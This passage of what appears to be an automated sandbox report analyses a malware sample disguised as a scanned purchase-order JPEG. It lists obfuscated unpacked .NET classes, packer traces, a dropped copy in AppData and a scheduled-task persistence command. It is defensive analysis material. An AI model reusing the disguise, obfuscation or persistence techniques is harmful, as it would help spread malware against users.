                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.7c00000.5.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 0_2_05689168 pushad ; iretd 0_2_05689169
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 0_2_0568916A push esp; iretd 0_2_05689171
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 0_2_0573DF67 push eax; mov dword ptr [esp], ecx 0_2_0573DF7C
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 0_2_0C1C0526 push ss; ret 0_2_0C1C0527
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 0_2_0C1C1638 pushfd ; iretd 0_2_0C1C1639
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Code function: 6_2_06919233 push es; ret 6_2_06919244
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Code function: 8_2_05219168 pushad ; iretd 8_2_05219169
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Code function: 8_2_0521916B push esp; iretd 8_2_05219171
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Code function: 8_2_085A2FB0 push 280561D5h; iretd 8_2_085A3B35
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Code function: 11_2_06969233 push es; ret 11_2_06969244
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: section name: .text entropy: 7.8591431826748455
                  Source: HJnkiZjAPsec.exe.0.dr | Static PE information: section name: .text entropy: 7.8591431826748455
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, rUOgJt0bjpUgyk44Jk.cs | High entropy of concatenated method names: 'u7obr4x5Lf', 'GPkb0aQZgq', 'xRVbRyR4lv', 'lZWb1xHcSu', 'grDbmC17Tn', 'pRdb9WgDA7', 'JjabjGgQaK', 'bcRbPfdN2U', 'GbTbVGQJZb', 'OQ1bCwKkPa'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, vMdCrfAd4nqbuB563n.cs | High entropy of concatenated method names: 'dXybF8g5RL', 'MKhbJD1aLT', 'iiBbqG8wsU', 'DKlby3mqW1', 'EOtb6xO374', 'FZ3biDaCp5', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, lawgoLxSSTB4Kg1J3G.cs | High entropy of concatenated method names: 'EfampGBwqQ', 'gTbm0ic8Ol', 'FoRm1JXWfa', 'GBvm9aI5KF', 'V71mjyS8Bw', 'lOk1ejFGI2', 'iuy15IPr4N', 'fXb1oTAOrj', 'sDM1d3hiTE', 'BVP1QoJXGq'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, qRFW21zBV9snmNOmU0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jnFLkhAepT', 'lwuLfbNXmm', 'h18Ls6nV41', 'kCGLa4LW2t', 'L9TLbdNmYl', 'qA7LLFLcjF', 'zcnL44t6gG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, fnrqqnN3duUCtfDNFs.cs | High entropy of concatenated method names: 'B89F3K5C8Dxl2NV0OCr', 'pp796t5EgvAK0gjEOpv', 'GgambiqEGY', 'ngamLGj1yS', 'BY4m4rJPnd', 'uhUkNA5W9IWoSoDPjyJ', 'M1BeCv58iZrmG4npmIi'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, vB3hwc3YK8Lc8pDEAgo.cs | High entropy of concatenated method names: 'lTALl57U4a', 'GZ3Lv1HGYN', 'H0lLZBmnDH', 'M2sLuyKcbi', 'PwOLSXvEtL', 'ehlLW3Q7yC', 'FUTLw1eg45', 'TSxL8VNyso', 'Ir5LHOVxns', 'IjnLxMZBA9'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, HxyNHvlbf1bHwZm5Js.cs | High entropy of concatenated method names: 'i7YaV5BUj7', 'HgCaCiELxx', 'ToString', 'F0CarxRoCB', 'HgDa0Ty9GB', 'NqjaRQWoG8', 'xtFa1eND7K', 'Jv7amxQfDW', 'GpOa9kKxUh', 'pGDajUJMIF'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, fOO8vIHqZjUhSvlGIT.cs | High entropy of concatenated method names: 'S3vfGAEYB9', 'c2sfByidvx', 'FFef6Ljjdu', 'cbPfAk0xl2', 'rb9fJ6Nrpx', 'n6SfqupGbr', 'makfy5ZT1E', 'pwDfi8XcXO', 'Qq9f39Elbh', 'Nbef7ltrnV'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, v7j940IZEcFHWEp7Ga.cs | High entropy of concatenated method names: 'WidRuZIVJ0', 'MQwRWd5aX5', 'ds6R8eafKY', 'Rr7RHHA0Qn', 'EBiRf5mjJ0', 'RQNRs2E6qK', 'opfRaiVR7S', 'rIyRbIs2W8', 'K30RLVBAAY', 'm0VR4idEPN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, UZdRY7cogvT20oexjf.cs | High entropy of concatenated method names: 'ToString', 't0vsMmBUKm', 'OcZsJBUxwu', 'XFJsqnqsVB', 'tVdsyA7sIT', 'n0CsijUWdc', 'AOas3e2OIT', 'UW8s7OWRFE', 'fNJsOsF65A', 'DqCsEZDp1j'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, D4ioqt7O1wPYlWLKsR.cs | High entropy of concatenated method names: 'ApnadP2bs3', 'rk7atBw06f', 'HUjb2k3D5S', 'E4abYSDALn', 'yNAaM0i478', 'buFaBhSoPU', 'wwCaKbEvfG', 'HWLa6atuQA', 'mp3aA4Fh2X', 'WnPaXpNMNH'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, SuyLm2iEjbBSRtgLPT.cs | High entropy of concatenated method names: 'cZtLYDnprB', 'R5XLgHuvw7', 'Np4LTquifb', 'wBgLrovKIm', 'ELDL08hpHZ', 'GUfL1TC3pE', 'GgZLmJdCxR', 'GfMboVnZMZ', 'Juibd8JKy2', 'GIWbQBZPsG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, PHDnrB5XeaB5EXDJxo.cs | High entropy of concatenated method names: 'cOm1So05AA', 'aFu1wLVJwM', 'Q9uRqFEv11', 'DsjRyIBZTQ', 'TUDRi48gnI', 'd5BR38D4an', 'zGSR7plgsU', 'udGROs9EMM', 'WbnRE8LhcY', 'cYdRGslLbW'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nRLN6swQWbhX71tdG3.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gIFNQ2cG18', 'AGYNt5TAwH', 'QPpNzxZ9M8', 'fW7g2xrcwh', 'dPkgY1LZdb', 'aTqgNoYu9R', 'k08ggAuLP2', 'g6UpfQKqXGsZnATQZ4k'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, T9cHuLXm465sBShJQ5.cs | High entropy of concatenated method names: 'Dispose', 'GTXYQS6qDL', 'pw2NJcPpQe', 'yiuII46TVm', 'n53Ytl0OfF', 'DDJYzOfQLQ', 'ProcessDialogKey', 'GSpN2EI8y0', 'YfeNYnAINp', 'mHSNNj749n'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, BugJBK1VtFydZ6UXaU.cs | High entropy of concatenated method names: 'mqu9lyjgeg', 'nAU9vjhhsP', 'q6A9ZCMQh3', 'IfJ9u9JOIx', 'jSO9SuI6lS', 'lgP9WtbcHk', 'mju9wfvXZI', 'IoU98bKyjc', 'PyX9HAtxV8', 'g8W9xX5KLu'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, MFN8rg2GruKOYi7YiH.cs | High entropy of concatenated method names: 'nmgk8YZloV', 'AUlkH7AFxr', 'WoGkFCAoRY', 'DbHkJZ7BBW', 'RKHkyIDh8A', 'RrAkidfqsq', 'kwYk7SMI0L', 'jUbkONG9XM', 'ze0kGt91oF', 'cQKkMnkEnN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, d9gZaTJIdXurF7Iqc0.cs | High entropy of concatenated method names: 'ypXZdyB1Q', 'y7VuUXVuk', 'HLjWClp9U', 'KEowqItGK', 'UWIH9b8xc', 'AXZxqlOo5', 'tn6Zu3fyjyHW2Xydmc', 'dRevihZqsjLSKNkBwn', 'S43b8FnN7', 'zpF47DCvY'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, uFd20xUXZshMhqnhw3.cs | High entropy of concatenated method names: 'Stg9r2Am85', 'XZ69RX9CAh', 'Le99mpqpH9', 'XOTmtfOnkE', 'ARfmzAOV5v', 'kaQ92jQbID', 'Qyf9YhLcn2', 'W4M9N6jnQh', 'Op19gscMhL', 'Jsr9T4dHJ5'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs | High entropy of concatenated method names: 'C64gptgJxy', 'xiMgrlcCmt', 'uiCg01Us7o', 'bylgRdjNmN', 'z6xg1XyfxH', 'fxKgmORPkM', 'Y9jg9Fmaau', 'BRygjJujT3', 'lH0gPuE6MG', 'GP3gV0uU3f'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nhtqyFvX8yKhXJY77Y.cs | High entropy of concatenated method names: 'YLg063Fm5E', 'ckA0A9a9gn', 'QcS0X8I1Gw', 'sgS0DQUvfq', 'RNc0eiKSqI', 'PtR05fWZDj', 'q2X0oKpF8I', 'lb80d9MmVc', 'OMV0Q53gf8', 'Uf50tNNAEg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, wKw7XJ3eEkT0Yh3oA6U.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fp546pvCgm', 'Y0e4A3mRF7', 'h8R4XVZO6q', 'zB84DHoYrG', 'TKF4eiIghU', 'xCC45JJTC9', 'G1W4oT9fTU'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, g7preEo0LavFFXlOLa.cs | High entropy of concatenated method names: 'S9QY9E3S2e', 'HIBYjCul7i', 'SmwYVYhZMI', 'cGXYCEfx4m', 'cgmYfN1Ds8', 'dNHYsQkMaM', 'wK1RObicwdXdwmr7cL', 'o62HfqXYnZw6BkCreT', 'h8xYYM8raJ', 'HdiYgWTwBg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, rUOgJt0bjpUgyk44Jk.cs | High entropy of concatenated method names: 'u7obr4x5Lf', 'GPkb0aQZgq', 'xRVbRyR4lv', 'lZWb1xHcSu', 'grDbmC17Tn', 'pRdb9WgDA7', 'JjabjGgQaK', 'bcRbPfdN2U', 'GbTbVGQJZb', 'OQ1bCwKkPa'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, vMdCrfAd4nqbuB563n.cs | High entropy of concatenated method names: 'dXybF8g5RL', 'MKhbJD1aLT', 'iiBbqG8wsU', 'DKlby3mqW1', 'EOtb6xO374', 'FZ3biDaCp5', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, lawgoLxSSTB4Kg1J3G.cs | High entropy of concatenated method names: 'EfampGBwqQ', 'gTbm0ic8Ol', 'FoRm1JXWfa', 'GBvm9aI5KF', 'V71mjyS8Bw', 'lOk1ejFGI2', 'iuy15IPr4N', 'fXb1oTAOrj', 'sDM1d3hiTE', 'BVP1QoJXGq'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, qRFW21zBV9snmNOmU0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jnFLkhAepT', 'lwuLfbNXmm', 'h18Ls6nV41', 'kCGLa4LW2t', 'L9TLbdNmYl', 'qA7LLFLcjF', 'zcnL44t6gG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, fnrqqnN3duUCtfDNFs.cs | High entropy of concatenated method names: 'B89F3K5C8Dxl2NV0OCr', 'pp796t5EgvAK0gjEOpv', 'GgambiqEGY', 'ngamLGj1yS', 'BY4m4rJPnd', 'uhUkNA5W9IWoSoDPjyJ', 'M1BeCv58iZrmG4npmIi'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, vB3hwc3YK8Lc8pDEAgo.cs | High entropy of concatenated method names: 'lTALl57U4a', 'GZ3Lv1HGYN', 'H0lLZBmnDH', 'M2sLuyKcbi', 'PwOLSXvEtL', 'ehlLW3Q7yC', 'FUTLw1eg45', 'TSxL8VNyso', 'Ir5LHOVxns', 'IjnLxMZBA9'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, HxyNHvlbf1bHwZm5Js.cs | High entropy of concatenated method names: 'i7YaV5BUj7', 'HgCaCiELxx', 'ToString', 'F0CarxRoCB', 'HgDa0Ty9GB', 'NqjaRQWoG8', 'xtFa1eND7K', 'Jv7amxQfDW', 'GpOa9kKxUh', 'pGDajUJMIF'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, fOO8vIHqZjUhSvlGIT.cs | High entropy of concatenated method names: 'S3vfGAEYB9', 'c2sfByidvx', 'FFef6Ljjdu', 'cbPfAk0xl2', 'rb9fJ6Nrpx', 'n6SfqupGbr', 'makfy5ZT1E', 'pwDfi8XcXO', 'Qq9f39Elbh', 'Nbef7ltrnV'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, v7j940IZEcFHWEp7Ga.cs | High entropy of concatenated method names: 'WidRuZIVJ0', 'MQwRWd5aX5', 'ds6R8eafKY', 'Rr7RHHA0Qn', 'EBiRf5mjJ0', 'RQNRs2E6qK', 'opfRaiVR7S', 'rIyRbIs2W8', 'K30RLVBAAY', 'm0VR4idEPN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, UZdRY7cogvT20oexjf.csHigh entropy of concatenated method names: 'ToString', 't0vsMmBUKm', 'OcZsJBUxwu', 'XFJsqnqsVB', 'tVdsyA7sIT', 'n0CsijUWdc', 'AOas3e2OIT', 'UW8s7OWRFE', 'fNJsOsF65A', 'DqCsEZDp1j'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, D4ioqt7O1wPYlWLKsR.csHigh entropy of concatenated method names: 'ApnadP2bs3', 'rk7atBw06f', 'HUjb2k3D5S', 'E4abYSDALn', 'yNAaM0i478', 'buFaBhSoPU', 'wwCaKbEvfG', 'HWLa6atuQA', 'mp3aA4Fh2X', 'WnPaXpNMNH'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, SuyLm2iEjbBSRtgLPT.csHigh entropy of concatenated method names: 'cZtLYDnprB', 'R5XLgHuvw7', 'Np4LTquifb', 'wBgLrovKIm', 'ELDL08hpHZ', 'GUfL1TC3pE', 'GgZLmJdCxR', 'GfMboVnZMZ', 'Juibd8JKy2', 'GIWbQBZPsG'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, PHDnrB5XeaB5EXDJxo.csHigh entropy of concatenated method names: 'cOm1So05AA', 'aFu1wLVJwM', 'Q9uRqFEv11', 'DsjRyIBZTQ', 'TUDRi48gnI', 'd5BR38D4an', 'zGSR7plgsU', 'udGROs9EMM', 'WbnRE8LhcY', 'cYdRGslLbW'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nRLN6swQWbhX71tdG3.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gIFNQ2cG18', 'AGYNt5TAwH', 'QPpNzxZ9M8', 'fW7g2xrcwh', 'dPkgY1LZdb', 'aTqgNoYu9R', 'k08ggAuLP2', 'g6UpfQKqXGsZnATQZ4k'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, T9cHuLXm465sBShJQ5.csHigh entropy of concatenated method names: 'Dispose', 'GTXYQS6qDL', 'pw2NJcPpQe', 'yiuII46TVm', 'n53Ytl0OfF', 'DDJYzOfQLQ', 'ProcessDialogKey', 'GSpN2EI8y0', 'YfeNYnAINp', 'mHSNNj749n'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, BugJBK1VtFydZ6UXaU.csHigh entropy of concatenated method names: 'mqu9lyjgeg', 'nAU9vjhhsP', 'q6A9ZCMQh3', 'IfJ9u9JOIx', 'jSO9SuI6lS', 'lgP9WtbcHk', 'mju9wfvXZI', 'IoU98bKyjc', 'PyX9HAtxV8', 'g8W9xX5KLu'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, MFN8rg2GruKOYi7YiH.csHigh entropy of concatenated method names: 'nmgk8YZloV', 'AUlkH7AFxr', 'WoGkFCAoRY', 'DbHkJZ7BBW', 'RKHkyIDh8A', 'RrAkidfqsq', 'kwYk7SMI0L', 'jUbkONG9XM', 'ze0kGt91oF', 'cQKkMnkEnN'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, d9gZaTJIdXurF7Iqc0.csHigh entropy of concatenated method names: 'ypXZdyB1Q', 'y7VuUXVuk', 'HLjWClp9U', 'KEowqItGK', 'UWIH9b8xc', 'AXZxqlOo5', 'tn6Zu3fyjyHW2Xydmc', 'dRevihZqsjLSKNkBwn', 'S43b8FnN7', 'zpF47DCvY'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, uFd20xUXZshMhqnhw3.csHigh entropy of concatenated method names: 'Stg9r2Am85', 'XZ69RX9CAh', 'Le99mpqpH9', 'XOTmtfOnkE', 'ARfmzAOV5v', 'kaQ92jQbID', 'Qyf9YhLcn2', 'W4M9N6jnQh', 'Op19gscMhL', 'Jsr9T4dHJ5'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.csHigh entropy of concatenated method names: 'C64gptgJxy', 'xiMgrlcCmt', 'uiCg01Us7o', 'bylgRdjNmN', 'z6xg1XyfxH', 'fxKgmORPkM', 'Y9jg9Fmaau', 'BRygjJujT3', 'lH0gPuE6MG', 'GP3gV0uU3f'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nhtqyFvX8yKhXJY77Y.csHigh entropy of concatenated method names: 'YLg063Fm5E', 'ckA0A9a9gn', 'QcS0X8I1Gw', 'sgS0DQUvfq', 'RNc0eiKSqI', 'PtR05fWZDj', 'q2X0oKpF8I', 'lb80d9MmVc', 'OMV0Q53gf8', 'Uf50tNNAEg'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, wKw7XJ3eEkT0Yh3oA6U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fp546pvCgm', 'Y0e4A3mRF7', 'h8R4XVZO6q', 'zB84DHoYrG', 'TKF4eiIghU', 'xCC45JJTC9', 'G1W4oT9fTU'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, g7preEo0LavFFXlOLa.csHigh entropy of concatenated method names: 'S9QY9E3S2e', 'HIBYjCul7i', 'SmwYVYhZMI', 'cGXYCEfx4m', 'cgmYfN1Ds8', 'dNHYsQkMaM', 'wK1RObicwdXdwmr7cL', 'o62HfqXYnZw6BkCreT', 'h8xYYM8raJ', 'HdiYgWTwBg'
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe File created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
